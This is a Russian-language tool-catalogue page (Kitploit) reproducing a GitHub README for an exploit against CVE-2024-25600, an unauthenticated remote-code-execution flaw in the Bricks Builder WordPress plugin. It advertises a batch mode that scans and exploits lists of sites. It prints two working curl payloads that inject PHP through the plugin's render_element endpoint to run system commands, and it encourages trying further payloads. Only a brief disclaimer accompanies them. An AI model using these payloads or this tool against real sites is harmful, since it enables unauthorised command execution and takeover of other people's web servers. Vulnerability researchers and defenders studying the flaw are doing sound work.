Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

Репозиторий
932 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот инструмент предназначен для эксплуатации уязвимости CVE-2024-25600, обнаруженной в плагине Bricks Builder для WordPress. Уязвимость позволяет выполнять удаленный код без аутентификации на уязвимых сайтах. Инструмент автоматизирует процесс эксплуатации, получая nonces и отправляя специально сформированные запросы для выполнения произвольных команд.

Поделиться

Инструмент эксплуатации CVE-2024-25600 🚀

Описание 📝

Этот инструмент 🛠️ предназначен для эксплуатации уязвимости CVE-2024-25600 🕳️, обнаруженной в плагине Bricks Builder для WordPress. Уязвимость позволяет неаутентифицированное удаленное выполнение кода на затронутых сайтах 💻. Инструмент автоматизирует процесс эксплуатации путем получения nonce и отправки специально сформированных запросов для выполнения произвольных команд.

Возможности 🌟

  • Интерактивный режим: Взаимодействие с целевым сайтом в реальном времени 🕹️.
  • Пакетный режим: Сканирование и эксплуатация нескольких сайтов из списка 📋.
  • Выполнение команд: Выполнение произвольных команд на целевом сервере ⚙️.

Установка 🛠️

  1. Клонируйте этот репозиторий на свой локальный компьютер 🖥️ с помощью git clone.
  2. Перейдите в каталог клонированного репозитория.
  3. Установите необходимые библиотеки Python с помощью pip install -r requirements.txt.

Использование 📖

Интерактивный режим 🎮

  1. Запустите инструмент с помощью python exploit.py -u <URL>, чтобы начать интерактивный режим.
  2. Следуйте инструкциям на экране для отправки команд на целевой сервер.

Пакетный режим 📊

  1. Подготовьте текстовый файл со списком целевых URL.
  2. Запустите инструмент с помощью python exploit.py -l <путь_к_файлу>, чтобы просканировать и эксплуатировать перечисленные сайты.

Доказательство концепции (PoC) 📝

Базовый PoC, предоставленный разглашением, выглядит следующим образом:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Обновление: Второй PoC (более надежный)

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Возможно, что дополнительные полезные нагрузки могут дать лучшие результаты. Если мой эксплойт или доказательство концепции не работают для вас, я призываю вас экспериментировать с альтернативными полезными нагрузками, чтобы найти более эффективное решение.

Замените [HOST] на целевой сайт, а [NONCE] на значение nonce, полученное с сайта.

Ссылка 📖

Для получения дополнительной информации об уязвимости CVE-2024-25600 обратитесь к подробному разглашению на Snicco.io.

Отказ от ответственности ⚠️

Информация, предоставленная в этом README, предназначена только для образовательных целей. Несанкционированный взлом веб-сайтов или сетей является незаконным и неэтичным. 🚫

Благодарности 🙏

Благодарность исследователям безопасности, которые обнаружили и сообщили об этой уязвимости, предоставив сообществу информацию и инструменты для защиты веб-приложений.

Скачать инструмент